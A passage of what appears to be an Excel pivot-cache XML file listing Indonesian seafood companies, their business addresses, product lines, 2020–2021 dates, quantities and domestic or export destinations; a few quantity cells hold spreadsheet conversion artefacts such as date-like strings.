    <n v="6000"/>
    <s v="Kota Balikpapan"/>
    <m/>
  </r>
  <r>
    <n v="21722"/>
    <x v="291"/>
    <s v="PT. FININDO BATAM"/>
    <s v="Komplek Harbour View Blok A No.07, Kel. Sungai Jodoh, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-10-08T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21723"/>
    <x v="291"/>
    <s v="PT. FININDO BATAM"/>
    <s v="Komplek Harbour View Blok A No.07, Kel. Sungai Jodoh, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Teripang Kering"/>
    <d v="2020-10-08T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21724"/>
    <x v="107"/>
    <s v="CV, CHARLIE ERA PRANATA"/>
    <s v="Jl, Alor Komplek PPI Oeba, Kel, Fatubesi, Kec, Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21725"/>
    <x v="107"/>
    <s v="CV, CHARLIE ERA PRANATA"/>
    <s v="Jl, Alor Komplek PPI Oeba, Kel, Fatubesi, Kec, Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Beku (Cakalang)"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21727"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Alu-Alu, Julung-Julung, Kembung, Kuring, Makerel, Lemadang, Marlin, Meka, Makerel Pasifik)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="21728"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="21729"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Bawal Hitam, Malong, Kerisi, Gulama, Emperor, Sebelah, Senangin, Pisang-Pisang, Kuwe)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="21730"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="21731"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="21732"/>
    <x v="87"/>
    <s v="PT. SUKSES LAUTAN INDONESIA"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Probolinggo, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="21734"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Barakuda, Malong, Sebelah, Kerapu, Gerot-gerot, Layur, Monkfish, Sarden, Cakalang, Kakap, Baronang, Pari, Kurisi, Ekor Kuning)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="4813.6400000000003"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21735"/>
    <x v="571"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Gindara, Sarden, Ekor Kuning)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="5231"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21736"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="02/01/1900  10,00,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21737"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="07/01/1900  07,00,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21738"/>
    <x v="571"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hati Ikan Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="0.27083333333333331"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21739"/>
    <x v="571"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hati Ikan Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="0.27083333333333331"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21740"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Amberjack, Salem, Sarden, Ekor Kuning)"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="16/04/1900  23,05,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21741"/>
    <x v="571"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Salem, Pollock)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21742"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="04/01/1900  13,31,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21743"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="02/01/1900  07,00,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21744"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="2146.7800000000002"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21745"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="22,00,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21748"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="27/01/1900  20,39,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21749"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="19/02/1901  03,50,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21750"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="97959.03"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21751"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="99776.03"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21752"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="866.9"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21753"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="1057.7"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21754"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="1205.7"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21755"/>
    <x v="571"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="1050"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21756"/>
    <x v="571"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Agung Karya IV Blok B No,22, Kel, Papanggo, Kec, Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Nori"/>
    <d v="2020-08-28T00:00:00"/>
    <s v="01/01/1900  07,11,00"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21780"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rajungan Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="36500"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Bitung, Kota Kendari"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21781"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Pari Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="36500"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Bitung, Kota Kendari"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21785"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="36500"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kota Bitung, Kota Kendari"/>
    <s v="China, Malawi, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21786"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="36500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Kendari"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21787"/>
    <x v="58"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Jl. Lingkar Timur Pergudangan Sinar Buduran III Blok C-03, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="36500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Bitung, Kota Kendari"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21789"/>
    <x v="572"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="640000"/>
    <m/>
    <s v="Canada, France, Hong Kong, Japan, Malaysia, Netherlands, Singapore, Thailand, United Kingdom, United States"/>
  </r>
  <r>
    <n v="21790"/>
    <x v="572"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="785000"/>
    <m/>
    <s v="Canada, United States"/>
  </r>
  <r>
    <n v="21791"/>
    <x v="572"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Rebus Beku (Ultimate Pure &amp; Simple, Crab House Retail, Bistro, Pub Style, Savory Bay)"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="208000"/>
    <m/>
    <s v="United Kingdom, United States"/>
  </r>
  <r>
    <n v="21792"/>
    <x v="572"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Mentah Beku (Stuffed Imperials Crab Shells, Crab House Seafood)"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United Kingdom, United States"/>
  </r>
  <r>
    <n v="21793"/>
    <x v="572"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-10-01T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Belgium, Canada, Denmark, Netherlands, United States"/>
  </r>
  <r>
    <n v="21794"/>
    <x v="573"/>
    <s v="PT. ACEH LAMPULO JAYA BAHARI"/>
    <s v="Jl. Sisingamangaraja Ujung No.16, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21795"/>
    <x v="573"/>
    <s v="PT. ACEH LAMPULO JAYA BAHARI"/>
    <s v="Jl. Sisingamangaraja Ujung No.16, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Singapore, United States"/>
  </r>
  <r>
    <n v="21796"/>
    <x v="573"/>
    <s v="PT. ACEH LAMPULO JAYA BAHARI"/>
    <s v="Jl. Sisingamangaraja Ujung No.16, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Layang, Cakalang)"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="21797"/>
    <x v="574"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21798"/>
    <x v="574"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakap, Samge)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21799"/>
    <x v="574"/>
    <s v="PT. JALADRI PRO SOLUSI"/>
    <s v=" Jl. Muara Baru RT 22 RW 17 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21800"/>
    <x v="575"/>
    <s v="PT, CENTRALPERTIWI BAHARI PLANT II"/>
    <s v="Kampung Mandiri, Kec, Dente Teladas, Kabupaten Tulangbawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="2326545"/>
    <m/>
    <s v="Germany, Japan, Netherlands, United Kingdom, United States"/>
  </r>
  <r>
    <n v="21801"/>
    <x v="575"/>
    <s v="PT. CENTRALPERTIWI BAHARI PLANT II"/>
    <s v="Kampung Mandiri, Kec. Dente Teladas, Kabupaten Tulangbawang&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="3360062"/>
    <m/>
    <s v="Germany, Japan, Netherlands, United Kingdom, United States"/>
  </r>
  <r>
    <n v="21802"/>
    <x v="576"/>
    <s v="PT. HONG 777"/>
    <s v="Pergudangan Mutiara Kosambi I Blok A2 No.7, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Sarden, Selar, Cakalang)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21803"/>
    <x v="576"/>
    <s v="PT. HONG 777"/>
    <s v="Pergudangan Mutiara Kosambi I Blok A2 No.7, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Layur, Bawal, Kakap, Ekor Kuning)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21804"/>
    <x v="576"/>
    <s v="PT. HONG 777"/>
    <s v="Pergudangan Mutiara Kosambi I Blok A2 No.7, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Japan, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21805"/>
    <x v="573"/>
    <s v="PT. ACEH LAMPULO JAYA BAHARI"/>
    <s v="Jl. Sisingamangaraja Ujung No.16, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="21806"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="20000"/>
